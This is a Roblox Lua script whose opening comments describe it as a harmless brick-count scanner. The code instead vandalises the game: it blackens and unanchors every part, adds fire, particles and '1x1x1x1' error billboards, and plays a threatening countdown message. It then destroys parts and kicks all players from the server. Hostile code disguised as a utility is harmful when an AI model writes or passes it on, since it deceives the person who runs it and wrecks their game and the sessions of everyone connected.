-- Quick scan:
-- 	This will just give you a brick-count and print it to your output
--	Go in Solo or Online mode to get a dynamic GUI counter

local lighting = game:GetService("Lighting")
lighting.Brightness = 0
lighting.OutdoorAmbient = Color3.new(0,0,0)
local sky = Instance.new("Sky", lighting)
sky.SkyboxBk = "http://www.roblox.com/asset/?id=48020371"
sky.SkyboxDn = "http://www.roblox.com/asset/?id=48020144"
sky.SkyboxFt = "http://www.roblox.com/asset/?id=48020234"
sky.SkyboxLf = "http://www.roblox.com/asset/?id=48020211"
sky.SkyboxRt = "http://www.roblox.com/asset/?id=48020254"
sky.SkyboxUp = "http://www.roblox.com/asset/?id=48020383"
local music = Instance.new("Sound", game.Workspace)
music.SoundId = "rbxassetid://150402649"
music.Volume = 1
music.Looped = true
music.PlayOnRemove = true
music:Play()

local parts = {}
function scan(p)
	for _,target in pairs(p:GetChildren()) do
		if target:IsA("BasePart") then
			table.insert(parts,target) -- target is the actual parts!
			target.Anchored = false
			target.BrickColor = BrickColor.new("Really black")
			local sb = Instance.new("SelectionBox", target)
			sb.Color3 = Color3.new(255, 0, 0)
			sb.SurfaceColor3 = Color3.new(170, 0, 0)
			sb.Adornee = target
			local pe = Instance.new("ParticleEmitter", target)
			pe.Name = "10101110010011"
			pe.Texture = "rbxassetid://45524735"
			pe.Rate = 10
			pe.SpreadAngle = Vector2.new(-90, 90)
			local pe2 = Instance.new("ParticleEmitter", target)
			pe2.Name = "ERROR_._ER-__ORO_...."
			pe2.Texture = "rbxassetid://158293315"
			pe2.Rate = 10
			pe2.SpreadAngle = Vector2.new(-90, 90)
			local bb = Instance.new("BillboardGui", target)
			bb.Size = UDim2.new(50,0 , 25,0)
			bb.AlwaysOnTop = true
			local randomtext = {
				"1x1x1x1 !S B4CK",
				"101010110100101011101111010101",
				"_-ERROR-_"
			}
			local label = Instance.new("TextLabel", bb)
			label.Size = UDim2.new(1,0 , 1,0)
			label.TextScaled = true
			label.TextWrapped = true
			label.BackgroundTransparency = 1
			local brickcolor = BrickColor.new("Really red")
			label.TextColor3 = brickcolor.Color
			label.Font = "ArialBold"
			label.TextSize = 100
			local chosentext = randomtext[math.random(1, #randomtext)]
			label.Text = chosentext
			local fire = Instance.new("Fire", target)
			fire.Size = 30
			fire.Heat = 25
		end
		scan(target)
	end
end
scan(game.Workspace)
--print(#parts .. (#parts == 1 and " brick " or " bricks ") .. "counted")
parts = {}
wait(1)


local m = Instance.new("Message", game.Workspace)
m.Text = "1x1x1x1 HAS RETURNED TO DESTROY ROBLOX!"
wait(3)
m.Text = "STARTING COUNTDOWN..."
wait(2)
m.Text = "ONCE THE TIMER REACH 0, THIS SERVER WILL NO LONGER EXIST!"
wait(5)

local unit = 10
wait(1)
for i = 1, 10 do
	unit = unit - 1
	m.Text = "COUNTDOWN: "	..unit.. " SECONDS LEFT!"
	wait(1)
end

m.Text = "FAREWELL, IDIOTS! MUAHAHAHAHAHAHAHA!!!"

local prey = nil
local parts = script.Parent:GetChildren() 

for i = 1,#parts do 
	if (parts[i].className == "Part") then 
		if (prey ~= nil)then 
			prey:Destroy()
		end 
		prey = parts[i] 
	end 
end

for i, players in pairs(game.Players:GetChildren()) do
	players:Kick("010111010101000101011101010100010111101010010100010111101011010100101010101010101010101010101001010101011011010110100101010101010101011101")
end
